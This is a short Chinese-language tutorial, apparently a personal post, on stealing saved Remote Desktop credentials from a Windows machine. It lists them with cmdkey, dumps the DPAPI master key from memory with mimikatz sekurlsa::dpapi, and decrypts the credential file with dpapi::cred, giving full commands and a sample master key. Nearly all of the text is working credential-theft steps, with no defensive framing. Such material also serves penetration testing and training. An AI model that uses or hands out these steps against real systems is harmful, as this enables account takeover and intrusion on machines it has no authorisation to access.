当我们远程桌面连接的时候rdp会保存在凭证里
当 cmdkey /list
会看到凭证
我们的凭证存储在C:\Users\<username>\AppData\Local\Microsoft\Credentials\
中
mimikatz执行以下命令
mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\kaeiy\AppData\Local\Microsoft\Credentials\7AE15DF3D771BCB19CF01F7AA56EBF2A"
其中pData是加密的数据, guidMasterKey是凭据的GUID
记住guidMasterKey执行以下命令
mimikatz privilege::debug sekurlsa::dpapi
找到刚才GUID对应的MasterKey,这个就是pData的加密秘钥
mimikatz拿获取的MasterKey进行解密
mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\kaeiy\AppData\Local\Microsoft\Credentials\7AE15DF3D771BCB19CF01F7AA56EBF2A /masterkey:1986336c349d682060a33000e60fde50808168fd78734b71d5b866007352284793c3eaad3b4b9d3f83cc32049d3997e15885fd217c2ca57ae3113519d3320e86"